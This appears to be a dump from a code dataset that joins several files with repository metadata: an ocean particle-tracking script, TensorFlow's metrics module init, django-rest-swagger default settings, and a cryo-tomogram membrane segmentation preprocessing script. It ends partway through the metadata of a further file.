2021-07-13T12:55:20.000Z
|
North Atlantic/Particle Tracking/NorthAtlanticStokeTotalTracking.py
|
OceanParcels/SKIM-garbagepatchlocations
|
3c028e3ceba902ff79f52e31b83bed811bde1133
|
[
"MIT"
] | null | null | null |
North Atlantic/Particle Tracking/NorthAtlanticStokeTotalTracking.py
|
OceanParcels/SKIM-garbagepatchlocations
|
3c028e3ceba902ff79f52e31b83bed811bde1133
|
[
"MIT"
] | 1
|
2022-02-28T14:03:13.000Z
|
2022-02-28T14:03:13.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Wed Mar 14 14:43:49 2018
@author: Victor Onink
"""
from parcels import FieldSet, ParticleSet, JITParticle, AdvectionRK4,ErrorCode, plotTrajectoriesFile,Variable,Geographic,GeographicPolar
from datetime import timedelta, datetime
import numpy as np
from operator import attrgetter
import math
#We can add or remove all the zeros according to preference. In case that they are left there, we only get daily data for the currents which will end up with the code running faster, but we do lose time resolution. Tests will determine if this loss in time resolution is actually important
filenames = {'U': "/scratch/Victor/TotalData/20*.nc",
'V': "/scratch/Victor/TotalData/20*.nc",
'uuss':"/scratch/Victor/StokeData/Stoke*.nc",
'vuss':"/scratch/Victor/StokeData/Stoke*.nc",
'borU':"/scratch/Victor/AvgTotCur/boundary_velocitiesT*",
'borV':"/scratch/Victor/AvgTotCur/boundary_velocitiesT*"}
variables = {'U': 'eastward_eulerian_current_velocity',
'V': 'northward_eulerian_current_velocity',
'uuss':'uuss',
'vuss':'vuss',
'borU':'MaskUvel',
'borV':'MaskVvel'}
dimensions = {'U':{'time':'time','lat':'lat','lon':'lon'},
'V':{'time':'time','lat':'lat','lon':'lon'},
'uuss':{'time':'time','lat':'latitude','lon':'longitude'},
'vuss':{'time':'time','lat':'latitude','lon':'longitude'},
'borU':{'time':'time','lat':'lat','lon':'lon'},
'borV': {'time':'time','lat':'lat','lon':'lon'},
}
#%%
#Create the fieldset with the periodic halo and time extrapolation for the EKE
print 'Creating the fieldset'
fieldset = FieldSet.from_netcdf(filenames, variables, dimensions,allow_time_extrapolation=True)
fieldset.add_periodic_halo(zonal=True)
fieldset.uuss.units=GeographicPolar()
fieldset.vuss.units=Geographic()
#The starting coordinates of the Particles, for the North Pacific. They are generated
#by the code NAgrid.py, graciously send to me by David.
lons=np.load('/home/students/4056094/Desktop/Thesis/ParcelsOutput/North Atlantic/InputDistribution/LonsTestgrid0_5.npy')
lats=np.load('/home/students/4056094/Desktop/Thesis/ParcelsOutput/North Atlantic/InputDistribution/LatsTestgrid0_5.npy')
#lons, lats = np.meshgrid(lon,lat)
lons[lons<0]+=360
#And now we define what sort of particles we are actually dealing with
class SampleParticle(JITParticle):
# #Now the part to determine the age of the particle
Age=Variable('Age',initial=0.,dtype=np.float32)#agr is gonna be in seconds
prev_time=Variable('prev_time',initial=attrgetter('time'),to_write=False)
#Now the part to track the distance covered
# distance = Variable('distance', initial=0., dtype=np.float32)
# prev_lon = Variable('prev_lon', dtype=np.float32, to_write=False,
# initial=attrgetter('lon'))
# prev_lat = Variable('prev_lat', dtype=np.float32, to_write=False,
# initial=attrgetter('lat'))
# #Now I also want the particle to be deleted if it is on land (so it won't move)
# count=Variable('count',initial=0,to_write=False)
# init_lon = Variable('init_lon', dtype=np.float32, to_write=False,
# initial=attrgetter('lon'))
# init_lat = Variable('init_lat', dtype=np.float32, to_write=False,
# initial=attrgetter('lat'))
#The starting point of the similation and the endtime
print 'Creating the pset'
starttime=datetime(2002,1,1,0,0)
endtime=datetime(2014,12,31,21,0)
pset = ParticleSet(fieldset=fieldset, pclass=SampleParticle, lon=lons, lat=lats,time=starttime)
#%% All the different functions/kernels we want to have
def DeleteParticle(particle, fieldset, time, dt):
particle.delete()
print 'we deleted it at '+str(particle.lon)+' and '+str(particle.lat)
def AgeSample(particle, fiedset,time,dt):
current_time=particle.time
timedifference=current_time-particle.prev_time
particle.Age+=timedifference
particle.prev_time=current_time
#def TotalDistance(particle, fieldset, time, dt):
# Calculate the distance in latitudinal direction (using 1.11e2 kilometer per degree latitude)
# lat_dist = (particle.lat - particle.prev_lat) * 1.11e2
# Calculate the distance in longitudinal direction, using cosine(latitude) - spherical earth
# lon_dist = (particle.lon - particle.prev_lon) * 1.11e2 * math.cos(particle.lat * math.pi / 180)
# Calculate the total Euclidean distance travelled by the particle
# particle.distance += math.sqrt(math.pow(lon_dist, 2) + math.pow(lat_dist, 2))
# particle.prev_lon = particle.lon # Set the stored values for next iteration.
# particle.prev_lat = particle.lat
def periodicBC(particle,fieldset,time,dt):
if particle.lon<0:
particle.lon+=360
elif particle.lon >360:
particle.lon-=360
def RungeKutta4FullCurrents(particle,fieldset,time,dt):
lon0,lat0=particle.lon,particle.lat
constant=0.00001*(-1)
d=particle.depth
u0=constant*fieldset.borU[time,lon0,lat0,d]+fieldset.U[time,lon0,lat0,d]+fieldset.uuss[time,lon0,lat0,d]
v0=constant*fieldset.borV[time,lon0,lat0,d]+fieldset.V[time,lon0,lat0,d]+fieldset.vuss[time,lon0,lat0,d]
lon1=lon0+u0*dt/2
lat1=lat0+v0*dt/2
u1=constant*fieldset.borU[time+0.5*dt,lon1,lat1,d]+fieldset.U[time+0.5*dt,lon1,lat1,d]+fieldset.uuss[time+0.5*dt,lon1,lat1,d]
v1=constant*fieldset.borV[time+0.5*dt,lon1,lat1,d]+fieldset.V[time+0.5*dt,lon1,lat1,d]+fieldset.vuss[time+0.5*dt,lon1,lat1,d]
lon2=lon0+u1*dt/2
lat2=lat0+v1*dt/2
u2=constant*fieldset.borU[time+0.5*dt,lon2,lat2,d]+fieldset.U[time+0.5*dt,lon2,lat2,d]+fieldset.uuss[time+0.5*dt,lon2,lat2,d]
v2=constant*fieldset.borV[time+0.5*dt,lon2,lat2,d]+fieldset.V[time+0.5*dt,lon2,lat2,d]+fieldset.vuss[time+0.5*dt,lon2,lat2,d]
lon3=lon0+u2*dt
lat3=lat0+v2*dt
u3=constant*fieldset.borU[time+dt,lon3,lat3,d]+fieldset.U[time+dt,lon3,lat3,d]+fieldset.uuss[time+dt,lon3,lat3,d]
v3=constant*fieldset.borV[time+dt,lon3,lat3,d]+fieldset.V[time+dt,lon3,lat3,d]+fieldset.vuss[time+dt,lon3,lat3,d]
particle.lon+=(u0+2*u1+2*u2+u3)/6. * dt
particle.lat+=(v0+2*v1+2*v2+v3)/6. *dt
move=pset.Kernel(periodicBC)
Advection=pset.Kernel(RungeKutta4FullCurrents)
Agesam=pset.Kernel(AgeSample)
#Distsam=pset.Kernel(TotalDistance)
totalKernal=Advection+move+Agesam
#%%
pfile = pset.ParticleFile(name="/scratch/Victor/AtlanticStokeTotal3h",
outputdt=timedelta(hours=48))
Time=starttime
steps=0
while Time<=endtime:
steps+=1
Time+=timedelta(hours=48)
print 'now we start advecting them for how many steps? '+str(steps)
pset.execute(totalKernal,
runtime=timedelta(hours=48*(steps-1)), # runtime controls the interval of the plots
dt=timedelta(minutes=30),
recovery={ErrorCode.ErrorOutOfBounds: DeleteParticle},
output_file=pfile
) # the recovery kernel
#%%
| 49.113475
| 289
| 0.707004
|
4a0f2677afe2715ce479e1870bf3a0624ff73bdb
| 7,557
|
py
|
Python
|
tensorflow/contrib/metrics/__init__.py
|
yxiong/tensorflow
|
f71cc62282bf2e066f9ebd08cf3f605fc98c6e41
|
[
"Apache-2.0"
] | 6
|
2016-09-07T18:38:41.000Z
|
2020-01-12T23:01:03.000Z
|
tensorflow/contrib/metrics/__init__.py
|
yxiong/tensorflow
|
f71cc62282bf2e066f9ebd08cf3f605fc98c6e41
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/contrib/metrics/__init__.py
|
yxiong/tensorflow
|
f71cc62282bf2e066f9ebd08cf3f605fc98c6e41
|
[
"Apache-2.0"
] | 8
|
2017-06-08T09:46:06.000Z
|
2021-06-20T14:03:19.000Z
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""##Ops for evaluation metrics and summary statistics.
### API
This module provides functions for computing streaming metrics: metrics computed
on dynamically valued `Tensors`. Each metric declaration returns a
"value_tensor", an idempotent operation that returns the current value of the
metric, and an "update_op", an operation that accumulates the information
from the current value of the `Tensors` being measured as well as returns the
value of the "value_tensor".
To use any of these metrics, one need only declare the metric, call `update_op`
repeatedly to accumulate data over the desired number of `Tensor` values (often
each one is a single batch) and finally evaluate the value_tensor. For example,
to use the `streaming_mean`:
```python
value = ...
mean_value, update_op = tf.contrib.metrics.streaming_mean(values)
sess.run(tf.initialize_local_variables())
for i in range(number_of_batches):
print('Mean after batch %d: %f' % (i, update_op.eval())
print('Final Mean: %f' % mean_value.eval())
```
Each metric function adds nodes to the graph that hold the state necessary to
compute the value of the metric as well as a set of operations that actually
perform the computation. Every metric evaluation is composed of three steps
* Initialization: initializing the metric state.
* Aggregation: updating the values of the metric state.
* Finalization: computing the final metric value.
In the above example, calling streaming_mean creates a pair of state variables
that will contain (1) the running sum and (2) the count of the number of samples
in the sum. Because the streaming metrics use local variables,
the Initialization stage is performed by running the op returned
by `tf.initialize_local_variables()`. It sets the sum and count variables to
zero.
Next, Aggregation is performed by examining the current state of `values`
and incrementing the state variables appropriately. This step is executed by
running the `update_op` returned by the metric.
Finally, finalization is performed by evaluating the "value_tensor"
In practice, we commonly want to evaluate across many batches and multiple
metrics. To do so, we need only run the metric computation operations multiple
times:
```python
labels = ...
predictions = ...
accuracy, update_op_acc = tf.contrib.metrics.streaming_accuracy(
labels, predictions)
error, update_op_error = tf.contrib.metrics.streaming_mean_absolute_error(
labels, predictions)
sess.run(tf.initialize_local_variables())
for batch in range(num_batches):
sess.run([update_op_acc, update_op_error])
accuracy, mean_absolute_error = sess.run([accuracy, mean_absolute_error])
```
Note that when evaluating the same metric multiple times on different inputs,
one must specify the scope of each metric to avoid accumulating the results
together:
```python
labels = ...
predictions0 = ...
predictions1 = ...
accuracy0 = tf.contrib.metrics.accuracy(labels, predictions0, name='preds0')
accuracy1 = tf.contrib.metrics.accuracy(labels, predictions1, name='preds1')
```
Certain metrics, such as streaming_mean or streaming_accuracy, can be weighted
via a `weights` argument. The `weights` tensor must be the same size as the
labels and predictions tensors and results in a weighted average of the metric.
Other metrics, such as streaming_recall, streaming_precision, and streaming_auc,
are not well defined with regard to weighted samples. However, a binary
`ignore_mask` argument can be used to ignore certain values at graph executation
time.
## Metric `Ops`
@@streaming_accuracy
@@streaming_mean
@@streaming_recall
@@streaming_precision
@@streaming_auc
@@streaming_recall_at_k
@@streaming_mean_absolute_error
@@streaming_mean_iou
@@streaming_mean_relative_error
@@streaming_mean_squared_error
@@streaming_root_mean_squared_error
@@streaming_mean_cosine_distance
@@streaming_percentage_less
@@streaming_sensitivity_at_specificity
@@streaming_sparse_precision_at_k
@@streaming_sparse_recall_at_k
@@streaming_specificity_at_sensitivity
@@auc_using_histogram
@@accuracy
@@confusion_matrix
@@aggregate_metrics
@@aggregate_metric_map
## Set `Ops`
@@set_difference
@@set_intersection
@@set_size
@@set_union
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import,line-too-long,g-importing-member,wildcard-import
from tensorflow.contrib.metrics.python.metrics import *
from tensorflow.contrib.metrics.python.ops.confusion_matrix_ops import confusion_matrix
from tensorflow.contrib.metrics.python.ops.histogram_ops import auc_using_histogram
from tensorflow.contrib.metrics.python.ops.metric_ops import aggregate_metric_map
from tensorflow.contrib.metrics.python.ops.metric_ops import aggregate_metrics
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_accuracy
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_auc
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_absolute_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_cosine_distance
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_iou
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_relative_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_squared_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_tensor
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_percentage_less
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_precision
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_precision_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall_at_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_root_mean_squared_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sensitivity_at_specificity
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_precision_at_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_recall_at_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_specificity_at_sensitivity
from tensorflow.contrib.metrics.python.ops.set_ops import set_difference
from tensorflow.contrib.metrics.python.ops.set_ops import set_intersection
from tensorflow.contrib.metrics.python.ops.set_ops import set_size
from tensorflow.contrib.metrics.python.ops.set_ops import set_union
from tensorflow.python.util.all_util import make_all
__all__ = make_all(__name__)
| 42.694915
| 97
| 0.818711
|
4a0f28823cd0b8bb48beedcb19d78be6a6416aff
| 746
|
py
|
Python
|
rest_framework_swagger/__init__.py
|
kaitlin/django-rest-swagger
|
06a067cbb7d863ce1d9f6341ed4e96a14840f288
|
[
"BSD-2-Clause"
] | null | null | null |
rest_framework_swagger/__init__.py
|
kaitlin/django-rest-swagger
|
06a067cbb7d863ce1d9f6341ed4e96a14840f288
|
[
"BSD-2-Clause"
] | null | null | null |
rest_framework_swagger/__init__.py
|
kaitlin/django-rest-swagger
|
06a067cbb7d863ce1d9f6341ed4e96a14840f288
|
[
"BSD-2-Clause"
] | 1
|
2021-02-18T11:05:55.000Z
|
2021-02-18T11:05:55.000Z
|
VERSION = '0.2.8'
DEFAULT_SWAGGER_SETTINGS = {
'exclude_namespaces': [],
'api_version': '',
'api_path': '/',
'api_key': '',
'token_type': 'Token',
'enabled_methods': ['get', 'post', 'put', 'patch', 'delete'],
'is_authenticated': False,
'is_superuser': False,
'permission_denied_handler': None,
'template_path': 'rest_framework_swagger/index.html',
'doc_expansion': 'none',
}
try:
from django.conf import settings
SWAGGER_SETTINGS = getattr(settings, 'SWAGGER_SETTINGS', DEFAULT_SWAGGER_SETTINGS)
for key, value in DEFAULT_SWAGGER_SETTINGS.items():
if key not in SWAGGER_SETTINGS:
SWAGGER_SETTINGS[key] = value
except:
SWAGGER_SETTINGS = DEFAULT_SWAGGER_SETTINGS
| 27.62963
| 86
| 0.66622
|
4a0f28b3220c37092148bea29a82c2f8e8bda5ce
| 14,378
|
py
|
Python
|
code/tutorials/exp_domb/pre_tomos_seg.py
|
anmartinezs/pyseg_system
|
5bb07c7901062452a34b73f376057cabc15a13c3
|
[
"Apache-2.0"
] | 12
|
2020-01-08T01:33:02.000Z
|
2022-03-16T00:25:34.000Z
|
code/tutorials/exp_domb/pre_tomos_seg.py
|
anmartinezs/pyseg_system
|
5bb07c7901062452a34b73f376057cabc15a13c3
|
[
"Apache-2.0"
] | 8
|
2019-12-19T19:34:56.000Z
|
2022-03-10T10:11:28.000Z
|
code/tutorials/exp_domb/pre_tomos_seg.py
|
anmartinezs/pyseg_system
|
5bb07c7901062452a34b73f376057cabc15a13c3
|
[
"Apache-2.0"
] | 2
|
2022-03-30T13:12:22.000Z
|
2022-03-30T18:12:10.000Z
|
"""
Pre-processing for mb_graph_batch.py of double oriented membranes from a lumen labeled segmentation
Input: - STAR file with 3 columns:
+ _rlnMicrographName: tomogram original (denisity map)
+ _psSegImage: labelled tomogram with the segmentations
+ _mtMtubesCsv: (optional) a .csv file with microtubule center lines
- Setting for segmenting the pairs of membranes:
- Sub-volume splitting settings
Output: - A STAR file with 3 columns:
+ _rlnMicrographName: tomogram original
+ _rlnImageName: sub-volumes
+ _psSegImage: Oriented double membrane segmentations for each subvolume
+ Columns for localizing the sub-volumes within each original tomogram
"""
################# Package import
import gc
import os
import sys
import math
import time
import pyseg as ps
import scipy as sp
import skimage as sk
import numpy as np
from pyseg.globals import signed_distance_2d
###### Global variables
__author__ = 'Antonio Martinez-Sanchez'
MB_LBL_1, MB_LBL_2 = 1, 2
EXT_LBL_1, EXT_LBL_2 = 3, 4
GAP_LBL, BG_LBL = 5, 0
########################################################################################
# PARAMETERS
########################################################################################
ROOT_PATH = '/fs/pool/pool-ruben/antonio/nuc_mito'
# Input STAR file
in_star = ROOT_PATH + '/pre/in/dmb_seg_oriented.star'
# Output directory
out_dir = ROOT_PATH + '/pre/mbdo_nosplit'
# Subvolume splitting settings
sp_split = None # (2, 2, 1)
sp_off_voxels = 30 # vox
# Membrane segmentation
sg_lbl_mb1 = 1
sg_lbl_mb2 = 2
sg_lbl_ext1 = 3
sg_lbl_ext2 = 4
sg_lbl_gap = 5
sg_lbl_bg = 6
sg_res = 1.408 # nm/voxel
sg_mb_thick = 5 # nm
sg_mb_neigh = 20 # nm
sg_mb_gap = 40 # nm
sg_min_vx_seg = 10 # vx
# CSV file pre-processing
cv_coords_cools = (1, 2, 3)
cv_id_col = 4
# Microtubule settings
mt_rad = 30 # nm
mt_swap_xy = False
########################################################################################
# MAIN ROUTINE
########################################################################################
########## Print initial message
print('Pre-processing for SEG analysis of un-oriented membranes from TomoSegMemTV output.')
print('\tAuthor: ' + __author__)
print('\tDate: ' + time.strftime("%c") + '\n')
print('Options:')
print('\tOutput directory: ' + str(out_dir))
print('\tInput STAR file: ' + str(in_star))
print('\tData resolution: ' + str(sg_res) + ' nm/vx')
print('\tMembrane segmentation:')
print('\t\t-Segmentation labels:')
print('\t\t\t+Membrane 1: ' + str(sg_lbl_mb1))
print('\t\t\t+Membrane 2: ' + str(sg_lbl_mb2))
print('\t\t\t+External 1: ' + str(sg_lbl_ext1))
print('\t\t\t+External 2: ' + str(sg_lbl_ext2))
print('\t\t\t+Gap: ' + str(sg_lbl_gap))
print('\t\t-Segmentation resolution: ' + str(sg_res) + ' nm/vx')
print('\t\t-Membrane thickness: ' + str(sg_mb_thick) + ' nm')
print('\t\t-External neighbourhood maximum distance: ' + str(sg_mb_neigh) + ' nm')
print('\t\t-Gap maximum distance: ' + str(sg_mb_gap) + ' nm')
print('\t\t-Minum number of voxels per segmentation: ' + str(sg_min_vx_seg))
print('\tSub-volume splitting settings: ')
print('\t\t-Number of splits (X, Y, Z): ' + str(sp_split))
print('\t\t-Offset voxels: ' + str(sp_off_voxels))
print('\tMicrotubule settings:')
print('\t\t-Microtube luminal radius: ' + str(mt_rad) + ' nm')
print('\tCSV pre-processing: ')
print('\t\t-Columns for samples coordinates (X, Y, Z): ' + str(cv_coords_cools))
print('\t\t-Column for microtubule ID: ' + str(cv_id_col))
print('')
######### Process
print('Parsing input parameters...')
sp_res, mt_rad, sp_off_voxels = float(sg_res), float(mt_rad), int(sp_off_voxels)
out_stem = os.path.splitext(os.path.split(in_star)[1])[0]
conn_mask = np.ones(shape=(3,3,3))
out_seg_dir = out_dir + '/segs'
if not os.path.isdir(out_seg_dir):
os.makedirs(out_seg_dir)
print('Loading input STAR file...')
gl_star = ps.sub.Star()
try:
gl_star.load(in_star)
except ps.pexceptions.PySegInputError as e:
print('ERROR: input STAR file could not be loaded because of "' + e.get_message() + '"')
print('Terminated. (' + time.strftime("%c") + ')')
sys.exit(-1)
star = ps.sub.Star()
star.add_column(key='_rlnMicrographName')
star.add_column(key='_rlnImageName')
star.add_column(key='_psSegImage')
star.add_column(key='_psSegRot')
star.add_column(key='_psSegTilt')
star.add_column(key='_psSegPsi')
star.add_column(key='_psSegOffX')
star.add_column(key='_psSegOffY')
star.add_column(key='_psSegOffZ')
print('Main Routine: tomograms loop')
tomo_id = 0
for row in range(gl_star.get_nrows()):
in_ref = gl_star.get_element('_rlnMicrographName', row)
print('\tProcessing tomogram: ' + in_ref)
out_ref_stem = os.path.splitext(os.path.split(in_ref)[1])[0]
in_seg = gl_star.get_element('_psSegImage', row)
print('\t\t-Loading segmentation: ' + in_seg)
orig_seg = ps.disperse_io.load_tomo(gl_star.get_element('_psSegImage', row))
tomo_ref = ps.disperse_io.load_tomo(in_ref, mmap=True)
off_mask_min_x, off_mask_max_x = 0, tomo_ref.shape[0]
off_mask_min_y, off_mask_max_y = 0, tomo_ref.shape[1]
off_mask_min_z, off_mask_max_z = 0, tomo_ref.shape[2]
wide_x = off_mask_max_x - off_mask_min_x
wide_y = off_mask_max_y - off_mask_min_y
wide_z = off_mask_max_z - off_mask_min_z
if gl_star.has_column('_mtMtubesCsv'):
in_csv = gl_star.get_element('_mtMtubesCsv', row)
print('\tReading input CSV file: ' + in_csv)
mt_dic = ps.globals.read_csv_mts(in_csv, cv_coords_cools, cv_id_col, swap_xy=mt_swap_xy)
mts_points = list()
for mt_id, mt_samps in zip(iter(mt_dic.keys()), iter(mt_dic.values())):
mts_points += mt_samps
mts_points = np.asarray(mts_points, dtype=np.float32) * (1./sg_res)
print('\tSegmenting the microtubules...')
mt_mask = ps.globals.points_to_mask(mts_points, orig_seg.shape, inv=True)
mt_mask = sp.ndimage.morphology.distance_transform_edt(mt_mask, sampling=sg_res, return_indices=False)
mt_mask = mt_mask > mt_rad
print('\t\t-Membranes pair segmentation...')
sg_mb_thick_2 = 0.5 * sg_mb_thick
tomo_seg = np.zeros(shape=orig_seg.shape, dtype=np.int8)
mb1_dst = sp.ndimage.morphology.distance_transform_edt(orig_seg != sg_lbl_mb1, sampling=sg_res, return_indices=False)
mb2_dst = sp.ndimage.morphology.distance_transform_edt(orig_seg != sg_lbl_mb2, sampling=sg_res, return_indices=False)
tomo_seg[(mb1_dst <= sg_mb_thick_2 + sg_mb_neigh) & (orig_seg == sg_lbl_ext1)] = EXT_LBL_1
tomo_seg[(mb2_dst <= sg_mb_thick_2 + sg_mb_neigh) & (orig_seg == sg_lbl_ext2)] = EXT_LBL_2
tomo_seg[(mb1_dst <= sg_mb_thick_2 + sg_mb_gap) & (mb2_dst <= sg_mb_thick_2 + sg_mb_gap) & (orig_seg == sg_lbl_gap)] = GAP_LBL
tomo_seg[mb1_dst <= sg_mb_thick_2] = MB_LBL_1
tomo_seg[mb2_dst <= sg_mb_thick_2] = MB_LBL_2
tomo_seg[orig_seg == sg_lbl_bg] = BG_LBL
gap_dst = sp.ndimage.morphology.distance_transform_edt(tomo_seg != GAP_LBL, sampling=sg_res, return_indices=False)
tomo_seg[gap_dst > sg_mb_thick_2 + sg_mb_neigh] = BG_LBL
if gl_star.has_column('_mtMtubesCsv'):
tomo_seg[np.invert(mt_mask)] = BG_LBL
# Computer segmentation bounds
hold_mask = tomo_seg != BG_LBL
ids_mask = np.where(hold_mask)
off_mask_min_x, off_mask_max_x = ids_mask[0].min()-sp_off_voxels, ids_mask[0].max()+sp_off_voxels
if off_mask_min_x < 0:
off_mask_min_x = 0
if off_mask_max_x > hold_mask.shape[0]:
off_mask_max_x = hold_mask.shape[0]
off_mask_min_y, off_mask_max_y = ids_mask[1].min()-sp_off_voxels, ids_mask[1].max()+sp_off_voxels
if off_mask_min_y < 0:
off_mask_min_y = 0
if off_mask_max_y > hold_mask.shape[1]:
off_mask_max_y = hold_mask.shape[1]
off_mask_min_z, off_mask_max_z = ids_mask[2].min()-sp_off_voxels, ids_mask[2].max()+sp_off_voxels
if off_mask_min_z < 0:
off_mask_min_z = 0
if off_mask_max_z > hold_mask.shape[2]:
off_mask_max_z = hold_mask.shape[2]
del hold_mask
del ids_mask
print('\tSegmenting the membranes...')
if sp_split is None:
svol_seg = tomo_seg[off_mask_min_x:off_mask_max_x, off_mask_min_y:off_mask_max_y, off_mask_min_z:off_mask_max_z]
if ((svol_seg == MB_LBL_1).sum() >= sg_min_vx_seg) and ((svol_seg == MB_LBL_2).sum() > sg_min_vx_seg) \
and ((svol_seg == EXT_LBL_1).sum() >= sg_min_vx_seg) and ((svol_seg == EXT_LBL_2).sum() > sg_min_vx_seg) and \
((svol_seg == GAP_LBL).sum() >= sg_min_vx_seg):
svol = tomo_ref[off_mask_min_x:off_mask_max_x, off_mask_min_y:off_mask_max_y, off_mask_min_z:off_mask_max_z]
out_svol = out_seg_dir + '/' + out_ref_stem + '_tid_' + str(tomo_id) + '.mrc'
out_seg = out_seg_dir + '/' + out_ref_stem + '_tid_' + str(tomo_id) + '_seg.mrc'
ps.disperse_io.save_numpy(svol, out_svol)
ps.disperse_io.save_numpy(svol_seg, out_seg)
del svol_seg
row_dic = dict()
row_dic['_rlnMicrographName'] = in_ref
row_dic['_rlnImageName'] = out_svol
row_dic['_psSegImage'] = out_seg
row_dic['_psSegRot'] = 0
row_dic['_psSegTilt'] = 0
row_dic['_psSegPsi'] = 0
row_dic['_psSegOffX'] = off_mask_min_x # 0
row_dic['_psSegOffY'] = off_mask_min_y # 0
row_dic['_psSegOffZ'] = off_mask_min_z
star.add_row(**row_dic)
else:
print('\tSplitting into subvolumes:')
if sp_split[0] > 1:
hold_wide = int(math.ceil(wide_x / sp_split[0]))
hold_pad = int(math.ceil((off_mask_max_x - off_mask_min_x) / sp_split[0]))
hold_split = int(sp_split[0] * math.ceil(float(hold_pad)/hold_wide))
offs_x = list()
pad_x = off_mask_min_x + int(math.ceil((off_mask_max_x-off_mask_min_x) / hold_split))
offs_x.append((off_mask_min_x, pad_x+sp_off_voxels))
lock = False
while not lock:
hold = offs_x[-1][1] + pad_x
if hold >= off_mask_max_x:
offs_x.append((offs_x[-1][1] - sp_off_voxels, off_mask_max_x))
lock = True
else:
offs_x.append((offs_x[-1][1]-sp_off_voxels, offs_x[-1][1]+pad_x+sp_off_voxels))
else:
offs_x = [(off_mask_min_x, off_mask_max_x),]
if sp_split[1] > 1:
hold_wide = int(math.ceil(wide_y / sp_split[1]))
hold_pad = int(math.ceil((off_mask_max_y - off_mask_min_y) / sp_split[1]))
hold_split = int(sp_split[1] * math.ceil(float(hold_pad) / hold_wide))
offs_y = list()
pad_y = off_mask_min_y + int(math.ceil((off_mask_max_y-off_mask_min_y) / hold_split))
offs_y.append((off_mask_min_x, pad_y + sp_off_voxels))
lock = False
while not lock:
hold = offs_y[-1][1] + pad_y
if hold >= off_mask_max_y:
offs_y.append((offs_y[-1][1] - sp_off_voxels, off_mask_max_y))
lock = True
else:
offs_y.append((offs_y[-1][1] - sp_off_voxels, offs_y[-1][1] + pad_y + sp_off_voxels))
else:
offs_y = [(off_mask_min_x, off_mask_max_x),]
if sp_split[2] > 1:
hold_wide = int(math.ceil(wide_z / sp_split[2]))
hold_pad = int(math.ceil((off_mask_max_z - off_mask_min_z) / sp_split[2]))
hold_split = int(sp_split[2] * math.ceil(float(hold_pad) / hold_wide))
offs_z = list()
pad_z = off_mask_min_z + int(math.ceil((off_mask_max_z-off_mask_min_z) / hold_split))
offs_z.append((off_mask_min_z, pad_z + sp_off_voxels))
lock = False
while not lock:
hold = offs_z[-1][1] + pad_z
if hold >= off_mask_max_z:
offs_z.append((offs_z[-1][1] - sp_off_voxels, off_mask_max_z))
lock = True
else:
offs_z.append((offs_z[-1][1] - sp_off_voxels, offs_z[-1][1] + pad_z + sp_off_voxels))
else:
offs_z = [(off_mask_min_z, off_mask_max_z),]
split_id = 1
for off_x in offs_x:
for off_y in offs_y:
for off_z in offs_z:
print('\t\t-Splitting subvolume: [' + str(off_x) + ', ' + str(off_y) + ', ' + str(off_z) + ']')
svol_seg = tomo_seg[off_x[0]:off_x[1], off_y[0]:off_y[1], off_z[0]:off_z[1]]
if ((svol_seg == MB_LBL_1).sum() >= sg_min_vx_seg) and ((svol_seg == MB_LBL_2).sum() > sg_min_vx_seg) \
and ((svol_seg == EXT_LBL_1).sum() >= sg_min_vx_seg) and ((svol_seg == EXT_LBL_2).sum() > sg_min_vx_seg) and \
((svol_seg == GAP_LBL).sum() >= sg_min_vx_seg):
svol = tomo_ref[off_x[0]:off_x[1], off_y[0]:off_y[1], off_z[0]:off_z[1]]
out_svol = out_seg_dir + '/' + out_ref_stem + '_id_' + str(tomo_id) + '_split_' + str(split_id) + '.mrc'
out_seg = out_seg_dir + '/' + out_ref_stem + '_id_' + str(tomo_id) + '_split_' + str(split_id) + '_mb.mrc'
ps.disperse_io.save_numpy(svol, out_svol)
ps.disperse_io.save_numpy(svol_seg, out_seg)
split_id += 1
row_dic = dict()
row_dic['_rlnMicrographName'] = in_ref
row_dic['_rlnImageName'] = out_svol
row_dic['_psSegImage'] = out_seg
row_dic['_psSegRot'] = 0
row_dic['_psSegTilt'] = 0
row_dic['_psSegPsi'] = 0
row_dic['_psSegOffX'] = off_x[0]
row_dic['_psSegOffY'] = off_y[0]
row_dic['_psSegOffZ'] = off_z[0]
star.add_row(**row_dic)
# Prepare next iteration
gc.collect()
tomo_id += 1
out_star = out_dir + '/' + out_stem + '_pre.star'
print('\tStoring output STAR file in: ' + out_star)
star.store(out_star)
print('Terminated. (' + time.strftime("%c") + ')')
| 44.513932
| 138
| 0.612463
|
4a0f2945c4bb35e2e6109d3cfe3a4df686c62ca0
| 805
|
py
|
Python
|
pjproject_android/tests/pjsua/scripts-sendto/312_srtp1_recv_savp.py
|
WachterJud/qaul.net_legacy
|
9c2be0a38ad6e90fadc0d1150340e37d220997ae
|
[
"MIT",
"BSD-2-Clause",
